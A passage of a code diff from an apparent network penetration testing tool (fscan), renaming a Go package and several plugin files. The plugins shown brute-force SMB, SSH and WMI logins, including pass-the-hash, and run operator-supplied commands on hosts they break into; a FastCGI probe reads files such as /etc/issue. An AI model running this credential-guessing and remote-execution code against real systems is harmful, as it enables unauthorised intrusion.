pass = strings.Replace(pass, "{user}", user, -1) pass = strings.Replace(pass, "{user}", user, -1)
@ -31,30 +31,30 @@ func SmbScan(info *Config.HostInfo) (tmperr error) {
if success && err == nil { if success && err == nil {
// 认证成功,记录结果 // 认证成功,记录结果
var result string var result string
if common.Domain != "" { if Common.Domain != "" {
result = fmt.Sprintf("[✓] SMB认证成功 %v:%v Domain:%v\\%v Pass:%v", result = fmt.Sprintf("[✓] SMB认证成功 %v:%v Domain:%v\\%v Pass:%v",
info.Host, info.Ports, common.Domain, user, pass) info.Host, info.Ports, Common.Domain, user, pass)
} else { } else {
result = fmt.Sprintf("[✓] SMB认证成功 %v:%v User:%v Pass:%v", result = fmt.Sprintf("[✓] SMB认证成功 %v:%v User:%v Pass:%v",
info.Host, info.Ports, user, pass) info.Host, info.Ports, user, pass)
} }
common.LogSuccess(result) Common.LogSuccess(result)
return err return err
} else { } else {
// 认证失败,记录错误 // 认证失败,记录错误
errorMsg := fmt.Sprintf("[x] SMB认证失败 %v:%v User:%v Pass:%v Err:%v", errorMsg := fmt.Sprintf("[x] SMB认证失败 %v:%v User:%v Pass:%v Err:%v",
info.Host, info.Ports, user, pass, info.Host, info.Ports, user, pass,
strings.ReplaceAll(err.Error(), "\n", "")) strings.ReplaceAll(err.Error(), "\n", ""))
common.LogError(errorMsg) Common.LogError(errorMsg)
tmperr = err tmperr = err
// 检查是否需要中断扫描 // 检查是否需要中断扫描
if common.CheckErrs(err) { if Common.CheckErrs(err) {
return err return err
} }
// 检查是否超时 // 检查是否超时
timeoutLimit := int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout timeoutLimit := int64(len(Common.Userdict["smb"])*len(Common.Passwords)) * Common.Timeout
if time.Now().Unix()-startTime > timeoutLimit { if time.Now().Unix()-startTime > timeoutLimit {
return err return err
} }
@ -74,7 +74,7 @@ func SmblConn(info *Config.HostInfo, user string, pass string, signal chan struc
Port: 445, Port: 445,
User: user, User: user,
Password: pass, Password: pass,
Domain: common.Domain, Domain: Common.Domain,
Workstation: "", Workstation: "",
} }
@ -105,7 +105,7 @@ func doWithTimeOut(info *Config.HostInfo, user string, pass string) (flag bool,
select { select {
case <-signal: case <-signal:
return flag, err return flag, err
case <-time.After(time.Duration(common.Timeout) * time.Second): case <-time.After(time.Duration(Common.Timeout) * time.Second):
return false, errors.New("[!] SMB连接超时") return false, errors.New("[!] SMB连接超时")
} }
} }

50
Plugins/smb2.go → Plugins/SMB2.go
View File

@ -2,8 +2,8 @@ package Plugins
import ( import (
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"net" "net"
"os" "os"
"strings" "strings"
@ -15,7 +15,7 @@ import (
// SmbScan2 执行SMB2服务的认证扫描支持密码和哈希两种认证方式 // SmbScan2 执行SMB2服务的认证扫描支持密码和哈希两种认证方式
func SmbScan2(info *Config.HostInfo) (tmperr error) { func SmbScan2(info *Config.HostInfo) (tmperr error) {
// 如果未启用暴力破解则直接返回 // 如果未启用暴力破解则直接返回
if common.IsBrute { if Common.IsBrute {
return nil return nil
} }
@ -23,7 +23,7 @@ func SmbScan2(info *Config.HostInfo) (tmperr error) {
startTime := time.Now().Unix() startTime := time.Now().Unix()
// 使用哈希认证模式 // 使用哈希认证模式
if len(common.HashBytes) > 0 { if len(Common.HashBytes) > 0 {
return smbHashScan(info, hasprint, startTime) return smbHashScan(info, hasprint, startTime)
} }
@ -33,8 +33,8 @@ func SmbScan2(info *Config.HostInfo) (tmperr error) {
// smbHashScan 使用哈希进行认证扫描 // smbHashScan 使用哈希进行认证扫描
func smbHashScan(info *Config.HostInfo, hasprint bool, startTime int64) error { func smbHashScan(info *Config.HostInfo, hasprint bool, startTime int64) error {
for _, user := range common.Userdict["smb"] { for _, user := range Common.Userdict["smb"] {
for _, hash := range common.HashBytes { for _, hash := range Common.HashBytes {
success, err, printed := Smb2Con(info, user, "", hash, hasprint) success, err, printed := Smb2Con(info, user, "", hash, hasprint)
if printed { if printed {
hasprint = true hasprint = true
@ -47,11 +47,11 @@ func smbHashScan(info *Config.HostInfo, hasprint bool, startTime int64) error {
logFailedAuth(info, user, "", hash, err) logFailedAuth(info, user, "", hash, err)
if shouldStopScan(err, startTime, len(common.Userdict["smb"])*len(common.HashBytes)) { if shouldStopScan(err, startTime, len(Common.Userdict["smb"])*len(Common.HashBytes)) {
return err return err
} }
if len(common.Hash) > 0 { if len(Common.Hash) > 0 {
break break
} }
} }
@ -61,8 +61,8 @@ func smbHashScan(info *Config.HostInfo, hasprint bool, startTime int64) error {
// smbPasswordScan 使用密码进行认证扫描 // smbPasswordScan 使用密码进行认证扫描
func smbPasswordScan(info *Config.HostInfo, hasprint bool, startTime int64) error { func smbPasswordScan(info *Config.HostInfo, hasprint bool, startTime int64) error {
for _, user := range common.Userdict["smb"] { for _, user := range Common.Userdict["smb"] {
for _, pass := range common.Passwords { for _, pass := range Common.Passwords {
pass = strings.ReplaceAll(pass, "{user}", user) pass = strings.ReplaceAll(pass, "{user}", user)
success, err, printed := Smb2Con(info, user, pass, []byte{}, hasprint) success, err, printed := Smb2Con(info, user, pass, []byte{}, hasprint)
if printed { if printed {
@ -76,11 +76,11 @@ func smbPasswordScan(info *Config.HostInfo, hasprint bool, startTime int64) erro
logFailedAuth(info, user, pass, []byte{}, err) logFailedAuth(info, user, pass, []byte{}, err)
if shouldStopScan(err, startTime, len(common.Userdict["smb"])*len(common.Passwords)) { if shouldStopScan(err, startTime, len(Common.Userdict["smb"])*len(Common.Passwords)) {
return err return err
} }
if len(common.Hash) > 0 { if len(Common.Hash) > 0 {
break break
} }
} }
@ -91,20 +91,20 @@ func smbPasswordScan(info *Config.HostInfo, hasprint bool, startTime int64) erro
// logSuccessfulAuth 记录成功的认证 // logSuccessfulAuth 记录成功的认证
func logSuccessfulAuth(info *Config.HostInfo, user, pass string, hash []byte) { func logSuccessfulAuth(info *Config.HostInfo, user, pass string, hash []byte) {
var result string var result string
if common.Domain != "" { if Common.Domain != "" {
result = fmt.Sprintf("[✓] SMB2认证成功 %v:%v Domain:%v\\%v ", result = fmt.Sprintf("[✓] SMB2认证成功 %v:%v Domain:%v\\%v ",
info.Host, info.Ports, common.Domain, user) info.Host, info.Ports, Common.Domain, user)
} else { } else {
result = fmt.Sprintf("[✓] SMB2认证成功 %v:%v User:%v ", result = fmt.Sprintf("[✓] SMB2认证成功 %v:%v User:%v ",
info.Host, info.Ports, user) info.Host, info.Ports, user)
} }
if len(hash) > 0 { if len(hash) > 0 {
result += fmt.Sprintf("Hash:%v", common.Hash) result += fmt.Sprintf("Hash:%v", Common.Hash)
} else { } else {
result += fmt.Sprintf("Pass:%v", pass) result += fmt.Sprintf("Pass:%v", pass)
} }
common.LogSuccess(result) Common.LogSuccess(result)
} }
// logFailedAuth 记录失败的认证 // logFailedAuth 记录失败的认证
@ -112,22 +112,22 @@ func logFailedAuth(info *Config.HostInfo, user, pass string, hash []byte, err er
var errlog string var errlog string
if len(hash) > 0 { if len(hash) > 0 {
errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Hash:%v Err:%v", errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Hash:%v Err:%v",
info.Host, info.Ports, user, common.Hash, err) info.Host, info.Ports, user, Common.Hash, err)
} else { } else {
errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Pass:%v Err:%v", errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Pass:%v Err:%v",
info.Host, info.Ports, user, pass, err) info.Host, info.Ports, user, pass, err)
} }
errlog = strings.ReplaceAll(errlog, "\n", " ") errlog = strings.ReplaceAll(errlog, "\n", " ")
common.LogError(errlog) Common.LogError(errlog)
} }
// shouldStopScan 检查是否应该停止扫描 // shouldStopScan 检查是否应该停止扫描
func shouldStopScan(err error, startTime int64, totalAttempts int) bool { func shouldStopScan(err error, startTime int64, totalAttempts int) bool {
if common.CheckErrs(err) { if Common.CheckErrs(err) {
return true return true
} }
if time.Now().Unix()-startTime > (int64(totalAttempts) * common.Timeout) { if time.Now().Unix()-startTime > (int64(totalAttempts) * Common.Timeout) {
return true return true
} }
@ -138,7 +138,7 @@ func shouldStopScan(err error, startTime int64, totalAttempts int) bool {
func Smb2Con(info *Config.HostInfo, user string, pass string, hash []byte, hasprint bool) (flag bool, err error, flag2 bool) { func Smb2Con(info *Config.HostInfo, user string, pass string, hash []byte, hasprint bool) (flag bool, err error, flag2 bool) {
// 建立TCP连接 // 建立TCP连接
conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:445", info.Host), conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:445", info.Host),
time.Duration(common.Timeout)*time.Second) time.Duration(Common.Timeout)*time.Second)
if err != nil { if err != nil {
return false, fmt.Errorf("连接失败: %v", err), false return false, fmt.Errorf("连接失败: %v", err), false
} }
@ -147,7 +147,7 @@ func Smb2Con(info *Config.HostInfo, user string, pass string, hash []byte, haspr
// 配置NTLM认证 // 配置NTLM认证
initiator := smb2.NTLMInitiator{ initiator := smb2.NTLMInitiator{
User: user, User: user,
Domain: common.Domain, Domain: Common.Domain,
} }
// 设置认证方式(哈希或密码) // 设置认证方式(哈希或密码)
@ -202,9 +202,9 @@ func logShareInfo(info *Config.HostInfo, user string, pass string, hash []byte,
var result string var result string
// 构建基础信息 // 构建基础信息
if common.Domain != "" { if Common.Domain != "" {
result = fmt.Sprintf("[*] SMB2共享信息 %v:%v Domain:%v\\%v ", result = fmt.Sprintf("[*] SMB2共享信息 %v:%v Domain:%v\\%v ",
info.Host, info.Ports, common.Domain, user) info.Host, info.Ports, Common.Domain, user)
} else { } else {
result = fmt.Sprintf("[*] SMB2共享信息 %v:%v User:%v ", result = fmt.Sprintf("[*] SMB2共享信息 %v:%v User:%v ",
info.Host, info.Ports, user) info.Host, info.Ports, user)
@ -212,12 +212,12 @@ func logShareInfo(info *Config.HostInfo, user string, pass string, hash []byte,
// 添加认证信息 // 添加认证信息
if len(hash) > 0 { if len(hash) > 0 {
result += fmt.Sprintf("Hash:%v ", common.Hash) result += fmt.Sprintf("Hash:%v ", Common.Hash)
} else { } else {
result += fmt.Sprintf("Pass:%v ", pass) result += fmt.Sprintf("Pass:%v ", pass)
} }
// 添加共享列表 // 添加共享列表
result += fmt.Sprintf("可用共享: %v", shares) result += fmt.Sprintf("可用共享: %v", shares)
common.LogSuccess(result) Common.LogSuccess(result)
} }

38
Plugins/ssh.go → Plugins/SSH.go
View File

@ -2,8 +2,8 @@ package Plugins
import ( import (
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"golang.org/x/crypto/ssh" "golang.org/x/crypto/ssh"
"io/ioutil" "io/ioutil"
"net" "net"
@ -13,15 +13,15 @@ import (
// SshScan 执行SSH服务的认证扫描 // SshScan 执行SSH服务的认证扫描
func SshScan(info *Config.HostInfo) (tmperr error) { func SshScan(info *Config.HostInfo) (tmperr error) {
if common.IsBrute { if Common.IsBrute {
return return
} }
startTime := time.Now().Unix() startTime := time.Now().Unix()
// 遍历用户名和密码字典进行认证尝试 // 遍历用户名和密码字典进行认证尝试
for _, user := range common.Userdict["ssh"] { for _, user := range Common.Userdict["ssh"] {
for _, pass := range common.Passwords { for _, pass := range Common.Passwords {
// 替换密码中的用户名占位符 // 替换密码中的用户名占位符
pass = strings.Replace(pass, "{user}", user, -1) pass = strings.Replace(pass, "{user}", user, -1)
@ -33,22 +33,22 @@ func SshScan(info *Config.HostInfo) (tmperr error) {
// 记录失败信息 // 记录失败信息
errlog := fmt.Sprintf("[x] SSH认证失败 %v:%v User:%v Pass:%v Err:%v", errlog := fmt.Sprintf("[x] SSH认证失败 %v:%v User:%v Pass:%v Err:%v",
info.Host, info.Ports, user, pass, err) info.Host, info.Ports, user, pass, err)
common.LogError(errlog) Common.LogError(errlog)
tmperr = err tmperr = err
// 检查是否需要中断扫描 // 检查是否需要中断扫描
if common.CheckErrs(err) { if Common.CheckErrs(err) {
return err return err
} }
// 检查是否超时 // 检查是否超时
timeoutLimit := int64(len(common.Userdict["ssh"])*len(common.Passwords)) * common.Timeout timeoutLimit := int64(len(Common.Userdict["ssh"])*len(Common.Passwords)) * Common.Timeout
if time.Now().Unix()-startTime > timeoutLimit { if time.Now().Unix()-startTime > timeoutLimit {
return err return err
} }
// 如果指定了SSH密钥则不进行密码尝试 // 如果指定了SSH密钥则不进行密码尝试
if common.SshKey != "" { if Common.SshKey != "" {
return err return err
} }
} }
@ -60,9 +60,9 @@ func SshScan(info *Config.HostInfo) (tmperr error) {
func SshConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) { func SshConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) {
// 准备认证方法 // 准备认证方法
var auth []ssh.AuthMethod var auth []ssh.AuthMethod
if common.SshKey != "" { if Common.SshKey != "" {
// 使用SSH密钥认证 // 使用SSH密钥认证
pemBytes, err := ioutil.ReadFile(common.SshKey) pemBytes, err := ioutil.ReadFile(Common.SshKey)
if err != nil { if err != nil {
return false, fmt.Errorf("读取密钥失败: %v", err) return false, fmt.Errorf("读取密钥失败: %v", err)
} }
@ -81,7 +81,7 @@ func SshConn(info *Config.HostInfo, user string, pass string) (flag bool, err er
config := &ssh.ClientConfig{ config := &ssh.ClientConfig{
User: user, User: user,
Auth: auth, Auth: auth,
Timeout: time.Duration(common.Timeout) * time.Second, Timeout: time.Duration(Common.Timeout) * time.Second,
HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error { HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
return nil return nil
}, },
@ -97,23 +97,23 @@ func SshConn(info *Config.HostInfo, user string, pass string) (flag bool, err er
flag = true flag = true
// 处理认证成功的情况 // 处理认证成功的情况
if common.Command != "" { if Common.Command != "" {
// 执行指定命令 // 执行指定命令
output, _ := session.CombinedOutput(common.Command) output, _ := session.CombinedOutput(Common.Command)
if common.SshKey != "" { if Common.SshKey != "" {
common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v\n命令输出:\n%v", Common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v\n命令输出:\n%v",
info.Host, info.Ports, string(output))) info.Host, info.Ports, string(output)))
} else { } else {
common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v\n命令输出:\n%v", Common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v\n命令输出:\n%v",
info.Host, info.Ports, user, pass, string(output))) info.Host, info.Ports, user, pass, string(output)))
} }
} else { } else {
// 仅记录认证成功 // 仅记录认证成功
if common.SshKey != "" { if Common.SshKey != "" {
common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v", Common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v",
info.Host, info.Ports)) info.Host, info.Ports))
} else { } else {
common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v", Common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v",
info.Host, info.Ports, user, pass)) info.Host, info.Ports, user, pass))
} }
} }

62
Plugins/scanner.go → Plugins/Scanner.go
View File

@ -2,9 +2,9 @@ package Plugins
import ( import (
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/WebScan/lib" "github.com/shadow1ng/fscan/WebScan/lib"
"github.com/shadow1ng/fscan/common"
"strconv" "strconv"
"strings" "strings"
"sync" "sync"
@ -14,19 +14,19 @@ func Scan(info Config.HostInfo) {
fmt.Println("[*] 开始信息扫描...") fmt.Println("[*] 开始信息扫描...")
// 本地信息收集模块 // 本地信息收集模块
if common.Scantype == "localinfo" { if Common.Scantype == "localinfo" {
ch := make(chan struct{}, common.Threads) ch := make(chan struct{}, Common.Threads)
wg := sync.WaitGroup{} wg := sync.WaitGroup{}
AddScan("localinfo", info, &ch, &wg) AddScan("localinfo", info, &ch, &wg)
wg.Wait() wg.Wait()
common.LogWG.Wait() Common.LogWG.Wait()
close(common.Results) close(Common.Results)
fmt.Printf("[✓] 扫描完成 %v/%v\n", common.End, common.Num) fmt.Printf("[✓] 扫描完成 %v/%v\n", Common.End, Common.Num)
return return
} }
// 解析目标主机IP // 解析目标主机IP
Hosts, err := common.ParseIP(info.Host, common.HostFile, common.NoHosts) Hosts, err := Common.ParseIP(info.Host, Common.HostFile, Common.NoHosts)
if err != nil { if err != nil {
fmt.Printf("[!] 解析主机错误: %v\n", err) fmt.Printf("[!] 解析主机错误: %v\n", err)
return return
@ -34,29 +34,29 @@ func Scan(info Config.HostInfo) {
// 初始化配置 // 初始化配置
lib.Inithttp() lib.Inithttp()
ch := make(chan struct{}, common.Threads) ch := make(chan struct{}, Common.Threads)
wg := sync.WaitGroup{} wg := sync.WaitGroup{}
var AlivePorts []string var AlivePorts []string
if len(Hosts) > 0 || len(common.HostPort) > 0 { if len(Hosts) > 0 || len(Common.HostPort) > 0 {
// ICMP存活性检测 // ICMP存活性检测
if (common.NoPing == false && len(Hosts) > 1) || common.Scantype == "icmp" { if (Common.NoPing == false && len(Hosts) > 1) || Common.Scantype == "icmp" {
Hosts = CheckLive(Hosts, common.Ping) Hosts = CheckLive(Hosts, Common.Ping)
fmt.Printf("[+] ICMP存活主机数量: %d\n", len(Hosts)) fmt.Printf("[+] ICMP存活主机数量: %d\n", len(Hosts))
if common.Scantype == "icmp" { if Common.Scantype == "icmp" {
common.LogWG.Wait() Common.LogWG.Wait()
return return
} }
} }
// 端口扫描策略 // 端口扫描策略
AlivePorts = executeScanStrategy(Hosts, common.Scantype) AlivePorts = executeScanStrategy(Hosts, Common.Scantype)
// 处理自定义端口 // 处理自定义端口
if len(common.HostPort) > 0 { if len(Common.HostPort) > 0 {
AlivePorts = append(AlivePorts, common.HostPort...) AlivePorts = append(AlivePorts, Common.HostPort...)
AlivePorts = common.RemoveDuplicate(AlivePorts) AlivePorts = Common.RemoveDuplicate(AlivePorts)
common.HostPort = nil Common.HostPort = nil
fmt.Printf("[+] 总计存活端口: %d\n", len(AlivePorts)) fmt.Printf("[+] 总计存活端口: %d\n", len(AlivePorts))
} }
@ -70,37 +70,37 @@ func Scan(info Config.HostInfo) {
} }
info.Host, info.Ports = hostParts[0], hostParts[1] info.Host, info.Ports = hostParts[0], hostParts[1]
executeScanTasks(info, common.Scantype, &ch, &wg) executeScanTasks(info, Common.Scantype, &ch, &wg)
} }
} }
// URL扫描 // URL扫描
for _, url := range common.Urls { for _, url := range Common.Urls {
info.Url = url info.Url = url
AddScan("web", info, &ch, &wg) AddScan("web", info, &ch, &wg)
} }
// 等待所有任务完成 // 等待所有任务完成
wg.Wait() wg.Wait()
common.LogWG.Wait() Common.LogWG.Wait()
close(common.Results) close(Common.Results)
fmt.Printf("[✓] 扫描已完成: %v/%v\n", common.End, common.Num) fmt.Printf("[✓] 扫描已完成: %v/%v\n", Common.End, Common.Num)
} }
// executeScanStrategy 执行端口扫描策略 // executeScanStrategy 执行端口扫描策略
func executeScanStrategy(Hosts []string, scanType string) []string { func executeScanStrategy(Hosts []string, scanType string) []string {
switch scanType { switch scanType {
case "webonly", "webpoc": case "webonly", "webpoc":
return NoPortScan(Hosts, common.Ports) return NoPortScan(Hosts, Common.Ports)
case "hostname": case "hostname":
common.Ports = "139" Common.Ports = "139"
return NoPortScan(Hosts, common.Ports) return NoPortScan(Hosts, Common.Ports)
default: default:
if len(Hosts) > 0 { if len(Hosts) > 0 {
ports := PortScan(Hosts, common.Ports, common.Timeout) ports := PortScan(Hosts, Common.Ports, Common.Timeout)
fmt.Printf("[+] 存活端口数量: %d\n", len(ports)) fmt.Printf("[+] 存活端口数量: %d\n", len(ports))
if scanType == "portscan" { if scanType == "portscan" {
common.LogWG.Wait() Common.LogWG.Wait()
return nil return nil
} }
return ports return ports
@ -116,7 +116,7 @@ func executeScanTasks(info Config.HostInfo, scanType string, ch *chan struct{},
switch info.Ports { switch info.Ports {
case "135": case "135":
AddScan("findnet", info, ch, wg) AddScan("findnet", info, ch, wg)
if common.IsWmi { if Common.IsWmi {
AddScan("wmiexec", info, ch, wg) AddScan("wmiexec", info, ch, wg)
} }
case "445": case "445":
@ -160,7 +160,7 @@ func AddScan(scantype string, info Config.HostInfo, ch *chan struct{}, wg *sync.
// 增加总任务数 // 增加总任务数
Mutex.Lock() Mutex.Lock()
common.Num += 1 Common.Num += 1
Mutex.Unlock() Mutex.Unlock()
// 执行扫描 // 执行扫描
@ -168,7 +168,7 @@ func AddScan(scantype string, info Config.HostInfo, ch *chan struct{}, wg *sync.
// 增加已完成任务数 // 增加已完成任务数
Mutex.Lock() Mutex.Lock()
common.End += 1 Common.End += 1
Mutex.Unlock() Mutex.Unlock()
}() }()
} }

32
Plugins/wmiexec.go → Plugins/WMIExec.go
View File

@ -3,8 +3,8 @@ package Plugins
import ( import (
"errors" "errors"
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"os" "os"
"strings" "strings"
"time" "time"
@ -28,42 +28,42 @@ func init() {
} }
func WmiExec(info *Config.HostInfo) (tmperr error) { func WmiExec(info *Config.HostInfo) (tmperr error) {
if common.IsBrute { if Common.IsBrute {
return nil return nil
} }
starttime := time.Now().Unix() starttime := time.Now().Unix()
for _, user := range common.Userdict["smb"] { for _, user := range Common.Userdict["smb"] {
PASS: PASS:
for _, pass := range common.Passwords { for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1) pass = strings.Replace(pass, "{user}", user, -1)
flag, err := Wmiexec(info, user, pass, common.Hash) flag, err := Wmiexec(info, user, pass, Common.Hash)
errlog := fmt.Sprintf("[-] WmiExec %v:%v %v %v %v", info.Host, 445, user, pass, err) errlog := fmt.Sprintf("[-] WmiExec %v:%v %v %v %v", info.Host, 445, user, pass, err)
errlog = strings.Replace(errlog, "\n", "", -1) errlog = strings.Replace(errlog, "\n", "", -1)
common.LogError(errlog) Common.LogError(errlog)
if flag == true { if flag == true {
var result string var result string
if common.Domain != "" { if Common.Domain != "" {
result = fmt.Sprintf("[+] WmiExec %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user) result = fmt.Sprintf("[+] WmiExec %v:%v:%v\\%v ", info.Host, info.Ports, Common.Domain, user)
} else { } else {
result = fmt.Sprintf("[+] WmiExec %v:%v:%v ", info.Host, info.Ports, user) result = fmt.Sprintf("[+] WmiExec %v:%v:%v ", info.Host, info.Ports, user)
} }
if common.Hash != "" { if Common.Hash != "" {
result += "hash: " + common.Hash result += "hash: " + Common.Hash
} else { } else {
result += pass result += pass
} }
common.LogSuccess(result) Common.LogSuccess(result)
return err return err
} else { } else {
tmperr = err tmperr = err
if common.CheckErrs(err) { if Common.CheckErrs(err) {
return err return err
} }
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) { if time.Now().Unix()-starttime > (int64(len(Common.Userdict["smb"])*len(Common.Passwords)) * Common.Timeout) {
return err return err
} }
} }
if len(common.Hash) == 32 { if len(Common.Hash) == 32 {
break PASS break PASS
} }
} }
@ -73,8 +73,8 @@ func WmiExec(info *Config.HostInfo) (tmperr error) {
func Wmiexec(info *Config.HostInfo, user string, pass string, hash string) (flag bool, err error) { func Wmiexec(info *Config.HostInfo, user string, pass string, hash string) (flag bool, err error) {
target := fmt.Sprintf("%s:%v", info.Host, info.Ports) target := fmt.Sprintf("%s:%v", info.Host, info.Ports)
wmiexec.Timeout = int(common.Timeout) wmiexec.Timeout = int(Common.Timeout)
return WMIExec(target, user, pass, hash, common.Domain, common.Command, ClientHost, "", nil) return WMIExec(target, user, pass, hash, Common.Domain, Common.Command, ClientHost, "", nil)
} }
func WMIExec(target, username, password, hash, domain, command, clientHostname, binding string, cfgIn *wmiexec.WmiExecConfig) (flag bool, err error) { func WMIExec(target, username, password, hash, domain, command, clientHostname, binding string, cfgIn *wmiexec.WmiExecConfig) (flag bool, err error) {

30
Plugins/webtitle.go → Plugins/WebTitle.go
View File

@ -13,14 +13,14 @@ import (
"time" "time"
"unicode/utf8" "unicode/utf8"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/WebScan" "github.com/shadow1ng/fscan/WebScan"
"github.com/shadow1ng/fscan/WebScan/lib" "github.com/shadow1ng/fscan/WebScan/lib"
"github.com/shadow1ng/fscan/common"
"golang.org/x/text/encoding/simplifiedchinese" "golang.org/x/text/encoding/simplifiedchinese"
) )
func WebTitle(info *Config.HostInfo) error { func WebTitle(info *Config.HostInfo) error {
if common.Scantype == "webpoc" { if Common.Scantype == "webpoc" {
WebScan.WebScan(info) WebScan.WebScan(info)
return nil return nil
} }
@ -32,11 +32,11 @@ func WebTitle(info *Config.HostInfo) error {
return nil return nil
} }
} }
if !common.NoPoc && err == nil { if !Common.NoPoc && err == nil {
WebScan.WebScan(info) WebScan.WebScan(info)
} else { } else {
errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err) errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)
common.LogError(errlog) Common.LogError(errlog)
} }
return err return err
} }
@ -49,13 +49,13 @@ func GOWebTitle(info *Config.HostInfo) (err error, CheckData []WebScan.CheckData
info.Url = fmt.Sprintf("https://%s", info.Host) info.Url = fmt.Sprintf("https://%s", info.Host)
default: default:
host := fmt.Sprintf("%s:%s", info.Host, info.Ports) host := fmt.Sprintf("%s:%s", info.Host, info.Ports)
protocol := GetProtocol(host, common.Timeout) protocol := GetProtocol(host, Common.Timeout)
info.Url = fmt.Sprintf("%s://%s:%s", protocol, info.Host, info.Ports) info.Url = fmt.Sprintf("%s://%s:%s", protocol, info.Host, info.Ports)
} }
} else { } else {
if !strings.Contains(info.Url, "://") { if !strings.Contains(info.Url, "://") {
host := strings.Split(info.Url, "/")[0] host := strings.Split(info.Url, "/")[0]
protocol := GetProtocol(host, common.Timeout) protocol := GetProtocol(host, Common.Timeout)
info.Url = fmt.Sprintf("%s://%s", protocol, info.Url) info.Url = fmt.Sprintf("%s://%s", protocol, info.Url)
} }
} }
@ -113,14 +113,14 @@ func geturl(info *Config.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
if err != nil { if err != nil {
return err, "", CheckData return err, "", CheckData
} }
req.Header.Set("User-agent", common.UserAgent) req.Header.Set("User-agent", Common.UserAgent)
req.Header.Set("Accept", common.Accept) req.Header.Set("Accept", Common.Accept)
req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9") req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
if common.Cookie != "" { if Common.Cookie != "" {
req.Header.Set("Cookie", common.Cookie) req.Header.Set("Cookie", Common.Cookie)
} }
//if common.Pocinfo.Cookie != "" { //if Common.Pocinfo.Cookie != "" {
// req.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie) // req.Header.Set("Cookie", "rememberMe=1;"+Common.Pocinfo.Cookie)
//} else { //} else {
// req.Header.Set("Cookie", "rememberMe=1") // req.Header.Set("Cookie", "rememberMe=1")
//} //}
@ -162,7 +162,7 @@ func geturl(info *Config.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
if reurl != "" { if reurl != "" {
result += fmt.Sprintf(" 跳转url: %s", reurl) result += fmt.Sprintf(" 跳转url: %s", reurl)
} }
common.LogSuccess(result) Common.LogSuccess(result)
} }
if reurl != "" { if reurl != "" {
return nil, reurl, CheckData return nil, reurl, CheckData
@ -233,7 +233,7 @@ func GetProtocol(host string, Timeout int64) (protocol string) {
return return
} }
socksconn, err := common.WrapperTcpWithTimeout("tcp", host, time.Duration(Timeout)*time.Second) socksconn, err := Common.WrapperTcpWithTimeout("tcp", host, time.Duration(Timeout)*time.Second)
if err != nil { if err != nil {
return return
} }
@ -242,7 +242,7 @@ func GetProtocol(host string, Timeout int64) (protocol string) {
if conn != nil { if conn != nil {
defer func() { defer func() {
if err := recover(); err != nil { if err := recover(); err != nil {
common.LogError(err) Common.LogError(err)
} }
}() }()
conn.Close() conn.Close()

22
Plugins/fcgiscan.go
View File

@ -6,8 +6,8 @@ import (
"encoding/binary" "encoding/binary"
"errors" "errors"
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"io" "io"
"strconv" "strconv"
"strings" "strings"
@ -22,14 +22,14 @@ import (
// FcgiScan 执行FastCGI服务器漏洞扫描 // FcgiScan 执行FastCGI服务器漏洞扫描
func FcgiScan(info *Config.HostInfo) error { func FcgiScan(info *Config.HostInfo) error {
// 如果设置了暴力破解模式则跳过 // 如果设置了暴力破解模式则跳过
if common.IsBrute { if Common.IsBrute {
return nil return nil
} }
// 设置目标URL路径 // 设置目标URL路径
url := "/etc/issue" url := "/etc/issue"
if common.Path != "" { if Common.Path != "" {
url = common.Path url = Common.Path
} }
addr := fmt.Sprintf("%v:%v", info.Host, info.Ports) addr := fmt.Sprintf("%v:%v", info.Host, info.Ports)
@ -38,10 +38,10 @@ func FcgiScan(info *Config.HostInfo) error {
var cutLine = "-----ASDGTasdkk361363s-----\n" // 用于分割命令输出的标记 var cutLine = "-----ASDGTasdkk361363s-----\n" // 用于分割命令输出的标记
switch { switch {
case common.Command == "read": case Common.Command == "read":
reqParams = "" // 读取模式 reqParams = "" // 读取模式
